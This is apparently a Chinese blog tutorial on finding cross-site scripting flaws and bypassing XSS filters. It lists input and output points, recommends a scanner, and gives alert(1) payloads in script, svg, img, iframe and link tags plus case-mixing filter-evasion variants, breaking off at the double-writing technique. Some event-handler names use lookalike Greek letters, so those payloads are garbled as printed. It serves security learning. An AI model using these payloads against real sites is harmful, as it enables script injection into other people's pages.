前文
Hello,大家好,我是None Sec的C_soon5,今天给大家讲讲XSS Bypass
XSS挖掘思路
1:输入点和输出点进行XSS
输入点
URL参数
表单内容
JSONP
输出点
输出在标签之间,例如:<script>输出</script>
输出在属性之中,例如:<input value="输出" name="keyword">
输出在注释之中,例如://document.getElementById("order_select").value="输出"
2:扫描器
这里强烈推荐Xray,配合被动扫描,简直比一刀999还爽
Bypass
之前我根据CTF特训营的XSS Bypass写了篇文章:XSS绕WAF,大家可以看看
1:未经过任何过滤直接输出
<script>alert(1)</script>
<svg/οnlοad=alert(1)>
<img src=# οnerrοr=alert(1)>
<img src=# οnerrοr="javascript:alert(1)">
<a href=# οnmοuseοver=alert(1)>click</a>
<a href="javascript:alert(1)">click</a>
<iframe/οnlοad=alert(1)></iframe>
2:过滤关键字绕过
a、大小写绕过(仅限于未先转换为小写,直接替换关键字的情形)
<Script>alert(1)</scRipt>
<img srC=# onError=alErt(1)></img>
<a href=# onMouseover=Alert(1)></a>
b、双写